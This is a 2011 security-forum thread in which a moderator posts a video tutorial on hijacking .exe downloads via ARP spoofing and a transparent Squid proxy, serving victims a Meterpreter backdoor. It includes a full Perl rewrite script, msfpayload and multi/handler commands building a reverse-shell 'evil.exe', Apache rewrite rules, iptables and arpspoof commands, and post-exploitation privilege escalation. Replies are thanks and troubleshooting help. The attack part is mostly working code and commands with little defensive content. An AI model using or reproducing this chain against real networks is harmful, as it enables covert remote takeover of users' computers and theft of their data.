Results 1 to 5 of 5

Thread: [Video] Owning Windows (XP SP3 vs. Squid)

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Owning Windows (XP SP3 vs. Squid)

    Links
    Watch video on-line: http://g0tmi1k.blip.tv/file/4862927/
    Download video: http://www.mediafire.com/?l7gezd8ai263a72
    Download Script (replace.pl): http://www.mediafire.com/?nheqdn6h4i6w17k


    Brief Overview
    This screencast demonstrates hijacking applications when they are being downloaded from the Internet and replacing the program with a meterpreter agent instead. The files can be downloaded either via the target or another program (For example, self-updating programs).

    The attacker takes control of the traffic by doing a “Man In The Middle” (MITM) attack, to analyse the traffic, in-which if the requested file ends in ".exe", it is redirected to the attackers web server that will always reply with the same filename with the agent creating the illusion that it was the requested file.

    Please note: Unlike the other two videos previously, where the attacker was targeting programs/services that comes with the Operating System, the attacker pursuits 3rd party applications - or the process of trying to install them. The result of this is, there is more user interaction needed than before, whereas before it was either very little (visit any web page) or nothing. Therefore the attacker needs the target to perform a certain action(s) (either willing or unaware).
    The chosen method of attack can be performed by a simpler method, however this method was chosen for reasons of future posts.


    Scenario/Setup
    This is the third video in a series of attacking Operating Systems and our target has now updated to Windows XP Service Pack 3, in the aid of seeking better security, after becoming compromised... twice.

    After spending hours re-formatting, installing and restarting the target is using a fully up-to-date system running Windows XP SP3 system with the latest security patches as of March 2011. They haven't used their system "much" as every setting is still at their default options and haven't install any programs such as Anti-Virus, Firewalls or any browser-based application (E.g. Flash or Java).

    This time around, the attacker approaches the attack by attacking the process of installing new or updating existing software.


    What was needed?

    • Nmap – (Can be found in BackTrack 4-R2)
    • PostgreSQL – (Can be found in BackTrack 4-R2)
    • Metasploit – (Can be found in BackTrack 4-R2)
    • Apache – (Can be found in BackTrack 4-R2)
    • A Text Editor – (Kate can be found in BackTrack 4-R2)
    • Squid – (Can be found in the BackTrack repository )
    • arpspoof – (Part of the DSniff suite which can be found in the BackTrack 4-R2)



    replace.pl
    Code:
    #!/usr/bin/perl
    ########################################################################
    # replace.pl         --- Squid Script (Application replacement)        #
    # g0tmi1k 2011-03-09                                                   #
    ########################################################################
    use IO::Handle;
    use File::Basename;
    
    $|=1;
    $ourIP = "192.168.0.33";
    $debug = 0;
    
    if ($debug == 1) { open (DEBUG, '>>/tmp/replace_debug.log'); }
    autoflush DEBUG 1;
    
    while (<>) {
       chomp $_;
       if ($_ =~ /(.*\.exe)/i) {
          if ($debug == 1) { print DEBUG "Input: $url\n"; }
          $url = $1;
          $filename = basename( $url );
          $new_url = "http://$ourIP/$filename";
          print "$new_url\n";
          if ($debug == 1) { print DEBUG "Filename: $filename\nOutput: $new_url\n"; }
       }
       else {
          print "$_\n";
       }
    }
    Method

    • Start network services and obtain an IP address
    • Create resource file and agent for metasploit
    • Start and configure metasploit to listen for the backdoor
    • Configure and start apache web server
    • Download, install and configure Squid proxy
    • Perform a man in the middle attack
    • Wait for target to download a program (either willing or unknown)
    • Game Over



    Commands:
    Code:
    start-network
    dhclient eth0
    /etc/init.d/postgresql-8.3 start
    clear
    
    map 192.168.0.* -n -sn -sP
    nmap 192.168.0.103 -T4 -O -v
    clear
    
    echo "client.railgun.user32.MessageBoxA(0,\"Corrupt file. Please re-download\",\"Setup\",\"MB_OK\")" > /root/replace.rb
    msfpayload windows/meterpreter/reerse_tcp LHOST=192.168.0.33 LPORT=4444 X > /var/www/evil.exe 
    export GOCOW=1     # Always cow logo ;)
    msfconsole
    use multi/handler
    set PAYLOAD windows/meterpreter/reverse_tcp
    set LHOST 0.0.0.0
    set ExitOnSession false
    set AutoRunScript /root/replace.rb
    show options
    exploit -j
    
    #kate -> New
    Options +FollowSymlinks
    RewriteEngine on
    RewriteRule ^(.*) evil.exe
    # Save: /var/www/.htaccess
    #kate -> Open: /etc/apache2/sites-enabled/000-default
    #Edit (Line 11): AllowOverride All
    #Save
    start-apache   # /etc/init.d/apache2 start
    
    apt-cache search squid
    apt-get install squid3
    y
    update-rc.d -f squid3 remove
    
    kate -> Open: /etc/squid3/squid.conf
    Edit (Line 588): acl localnet src 192.168.0.0/16
    Edit (Line 644): http_access allow localnet
    Edit (Line 868): http_port 3128 transparent
    Add (Line: *end*): url_rewrite_program /root/replace.pl
    Save
    kate -> Open: /root/replace.pl
    chmod 755 /root/replace.pl
    /etc/init.d/squid3 restart
    
    iptables --table nat --append PREROUTING --in-interface eth0 --proto tcp --destination-port 80 --jump REDIRECT --to-port 3128
    echo 1 > /proc/sys/net/ipv4/ip_forward
    #cat /proc/sys/net/ipv4/ip_forward
    #Start -> run -> cmd -> arp -a
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    #Start -> run -> cmd -> arp -a
    
    IE -> http://www.filehippo.com -> Search: flash. Download & Run
    
    sessions -l -v
    #Kill arpspoof
    
    IE -> http://www,filehippo.com -> Search: notepad++. Download Older & Run
    
    arpspoof -i eth0 -t 192.168.0.103 192.168.0.1
    
    Notepad++ -> ? -> Check for updates
    
    #Kill arpspoof
    sessions -l -v
    sessions -i 2
    sysinfo
    getuid
    getsystem
    getuid
    Last edited by g0tmi1k; 03-10-2011 at 08:14 PM.
    Have you...g0tmi1k?

  2. #2
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Owning Windows (XP SP3 vs. Squid)

    Walk-through
    The attacker once again starts off by doing a quick sweep of the network with nmap and after identifying the target proceeds to do a port scan on the target. However this time around, no ports respond (due to the firewall being enabled by default now), which limits the returned information.

    The attacker then moves onto creating a resource file for metasploit which, by using railgun calls a simple Windows API command to display a message box which is used to give feedback to the target that the program has been executed and not left wondering what’s happening.
    The attacker continues the metasploit usage by creating the agent and configuring metasploit to listen for a connection back to it. Once a connection has been created the attacker sets the resource script to be automatically executed.

    The attacker proceeds by setting up an Apache web server which is used to deliver the agent to the user. The attacker enables and creates a "distributed configuration file" (.htaccess), that links any requested URL to the metasploit agent and returns with the same name as requested.

    As the attacker now has a backdoor and a delivery system ready the attacker needs a method of filtering the web traffic to create a rule to replace any requested URL which ends in EXE (which is a very common application extension used in a windows environment) to be redirected to the attackers web server instead. The attacker installs Squid3 cache proxy that can do such a thing by using a perl script (replace.pl).
    Ettercap could of also been used for an alternative solution, however due to limited scripting functionality the results weren't as high.

    As everything is now ready, the attacker just needs to redirect the traffic via their machine. Like before, the attack performs an ARP man in the middle attack with the aid of arpspoof.

    Everything is in place and ready for the target to request a program. This can be done by either requesting it themselves (visiting a site and downloading it "manually") or by a program that is already installed (it has to check for an update, found that there is an update available and automatically downloads & executes the program.)

    After waiting, the attacker notices that a session has been created and is able to stop the man in the middle attack as the attacker doesn't need to have the targets traffic as they have a direct connection to the target themselves.

    A simple bit of privilege escalation gives the attacker complete access to the targets machine.



    Notes:

    • The recording software did glitch in a few places - which I re-recorded a section and edited it in.
    • The first time when the target tries to download an application, they click on the notification bar at the top, rather than re-clicking on the click.
    • Adobe flash official web site, detects the browser agent and uses a different delivery system to install, which wouldn't have worked in default browser (Internet Explorer).
    • Not every auto-update features use ".exe" files to update.
    • It is recommended to check the checksum (E.g. MD5 or SHA1) of download programs before executing.
    • It is recommended to only download from the official sites, sources or mirrors. Flash was downloaded from adobe.com (filehippo redirects to it), whereas notepad++ was hosted on filehippo.com


    Song: Free Your Soul - Command Strange & Strings Track (Apex Remix) - Bachelors of Science
    Video length: 10:00
    Capture length: 34:11

    Blog Post: http://g0tmi1k.blogspot.com/2011/03/video-owning-windows-xp-sp3-vs-squid.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/38565-%5Bvideo%5D-owning-windows-xp-sp3-vs-squid.html#post191335
    Have you...g0tmi1k?

  3. #3
    Senior Member
    Join Date
    May 2010
    Posts
    198

    Default Re: [Video] Owning Windows (XP SP3 vs. Squid)

    I can't wait to play with this. This is another project I started but couldn't get to work. Now I can see what I was doing wrong.

    Thanks
    "Never do anything against conscience -- even if the state demands it."
    -- Albert Einstein

  4. #4
    Just burned his ISO
    Join Date
    Mar 2011
    Posts
    1

    Default Re: [Video] Owning Windows (XP SP3 vs. Squid)

    Thanks for this new tutorial
    You're doing a good job, thanks

    I tried to follow it but I've one error when I download Flash from fileHippo : "ERROR The requested URL could not be retrieved.
    While trying to retrieve the URL: http//[AttackerURL]/flashplayer10-3_b1_activex_030811.exe
    The following error was encountered:
    Connection to [Attacker IP] Failed
    The system returned: (113) No route to host."

    It seems i've failed squid configuration, or the script setting.
    I'll try to restart from the beginning, but if you have the solution...

    One more time, thanks for these tutorials

  5. #5
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Owning Windows (XP SP3 vs. Squid)

    Quote Originally Posted by Scamentology View Post
    I can't wait to play with this. This is another project I started but couldn't get to work. Now I can see what I was doing wrong.

    Thanks
    Hehe! Best of luck with it! Hope you have more success with it now



    Quote Originally Posted by Anaxag0re View Post
    Thanks for this new tutorial
    You're doing a good job, thanks

    I tried to follow it but I've one error when I download Flash from fileHippo : "ERROR The requested URL could not be retrieved.
    While trying to retrieve the URL: http//[AttackerURL]/flashplayer10-3_b1_activex_030811.exe
    The following error was encountered:
    Connection to [Attacker IP] Failed
    The system returned: (113) No route to host."

    It seems i've failed squid configuration, or the script setting.
    I'll try to restart from the beginning, but if you have the solution...

    One more time, thanks for these tutorials
    Thanks for the thanks!
    What happens when you try and do it locally on the attackers machine?
    That error is linked to squid.... Is the target on the same subnet? You may need to change
    "Edit (Line 588): acl localnet src 192.168.0.0/16"
    To fit your IPs
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Owning Sever through Local File Include
    By spawn in forum BackTrack Videos
    Replies: 1
    Last Post: 03-08-2011, 06:13 PM
  2. Replies: 5
    Last Post: 03-07-2011, 12:18 AM
  3. Replies: 1
    Last Post: 03-04-2011, 04:34 PM
  4. Replies: 21
    Last Post: 03-02-2011, 07:06 PM
  5. Owning a Windows XP with a shared folder.
    By sickness in forum BackTrack Videos
    Replies: 6
    Last Post: 02-12-2011, 02:56 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •